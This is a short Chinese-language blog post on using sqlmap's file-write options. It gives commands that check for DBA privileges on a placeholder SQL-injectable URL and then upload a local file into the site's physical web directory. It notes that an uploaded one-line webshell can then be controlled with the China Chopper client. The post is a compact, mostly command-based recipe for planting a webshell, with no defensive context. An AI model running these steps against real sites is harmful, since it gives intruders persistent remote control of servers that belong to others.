sqlmap:file参数使用

固若金汤 (1861) 2023-12-22 15:46:39
权限:必须为dba权限

file-write  从本地写入

file-dest   写入目标路径

判断是否是dba权限(显示TRUE或者FALSE,TRUE即为dba权限,反之不是)

sqlmap.py -u "http://www.xx.com/aa.aspx?id=123" --is-dba

写入文件至站点目录

sqlmap.py -u "http://www.xx.com/aa.aspx?id=123" --file-write=本地文件路径 --file-dest 网站路径(写入路径)+"/写入的文件名"

sqlmap.py -u "http://www.xx.com/aa.aspx?id=123" --file-write=F:/a.aspx --file-dest D:/虚拟目录/Front/cx.aspx

D:/虚拟目录/Front   为网站的物理路径

写入成功后,即可通过浏览器访问,若为一句话木马则可使用中国菜刀进行连接。

注:网站路径必须为网站的真实物理路径(即绝对路径。也就是从盘符开始的路径),否则无法写入数据。
THE END

发表评论